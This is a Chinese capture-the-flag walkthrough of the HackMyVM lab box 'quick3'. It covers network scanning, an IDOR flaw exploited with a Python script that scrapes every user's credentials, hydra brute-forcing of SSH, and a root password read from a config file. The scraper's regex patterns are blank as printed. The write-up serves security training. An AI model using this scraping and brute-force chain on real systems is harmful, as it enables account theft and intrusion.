• quick3-hydra

    kali和quick3都设置NAT模式

    quick3easy漏洞挖掘、越权测试、python爬虫、脚本编写、hydra 爆破、凭据收集

    主机发现

    netdiscover -i eth0 -r 192.168.44.193/24

    • 1

    服务探测

    nmap -sV -A -T4 -p- 192.168.44.133

    • 1

    得到只开放了80和22端口

    访问80web
    dirb目录扫描
    找到后台`http://192.168.44.133/customer/

    水平越权

    任意用户注册账号,登录
    查看用户信息,url有?id,尝试修改id,发现水平越权漏洞,查看其他用户密码

    写爬虫爬取所有用户密码

    import os 
import re
from datetime import datetime
import requests
import urllib3
from colorama import init
init(autoreset = True)

def write1(user_match):
	curr_dir = os.getcwd()
	vuln_file = '/user_' + datetime.now().date().strftime('%Y%m%d')+'.txt'
	f = open(curr_dir + vuln_file,'a+',encoding='utf-8')
	f.write(f"{user_match}"+"\n")
	f.close()
	
def write2(pass_match):
	curr_dir = os.getcwd()
	vuln_file = '/pass_' + datetime.now().date().strftime('%Y%m%d')+'.txt'
	f = open(curr_dir + vuln_file,'a+',encoding='utf-8')
	f.write(f"{pass_match}"+"\n")
	f.close()	

def poc_url(id):
	urllib3.disable_warnings()
	url1 = f"http://192.168.44.133/customer/user.php?id={id}"
	proxy = {
		'http':'http://127.0.0.1:8080',
		'https':'http://127.0.0.1:8080'
	}
	headers = {
		"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
		"Cookie":"PHPSESSID=dv5jvd9q7d5e6tk0itdfj5f96d"
	}
	res = requests.get(url1,headers=headers,proxies=None,verify=False,timeout=5)
	if res.status_code == 200:
		user_match = re.search(r'',res.text).group(1).lower().split()[0]
		pass_match = re.search(r'',res.text).group(1)
		
	write1(user_match)
	write2(pass_match)

if __name__ == '__main__':
	for i in range(1,30):
		poc_url(i)




# python写程序遇到了这个问题,vim打开时最后一个字符都是^M,导致输出的文本不可读出内容,只能用文本编辑器打开。file多了个with CR line terminators,转换成unix也不能解决,最后把换行符号换成"\n"才解决!


    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41
    • 42
    • 43
    • 44
    • 45
    • 46
    • 47
    • 48
    • 49
    • 50

    爆破SSH

    hydra -L user_20240416.txt -P pass_20240416.txt -t 16 ssh://192.168.44.133 

    • 1

    拿Flag

    cat user.txt
HMV{717f274ee66f8541a3031f175f615e72}

    • 1
    • 2

    提权

    ls /var/www/html
cat /var/www/html/customer/config.php
'root', 'fastandquicktobefaster'
su root

HMV{f178761104e933f9341f13f64b38538a}

    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
  • 相关阅读:
    SQL Proxy 角色重叠
    微服务介绍&微服务环境搭建
    【WSL】下载appx包将WSL装在非系统盘
    第6章——数据库的安全性
    jupyter中pip安装包会安装到别的环境。
    软件安全性测试工具
    HOOPS Commuicator:基于Web的交互式2D/3D图形轻量化引擎
    RabbitMQ第二个实操小案例——WorkQueue
    【多线程和锁】
    什么是身份证ocr识别?身份证ocr识别接口API能干什么?
  • 原文地址:https://blog.csdn.net/m0_64696290/article/details/138083951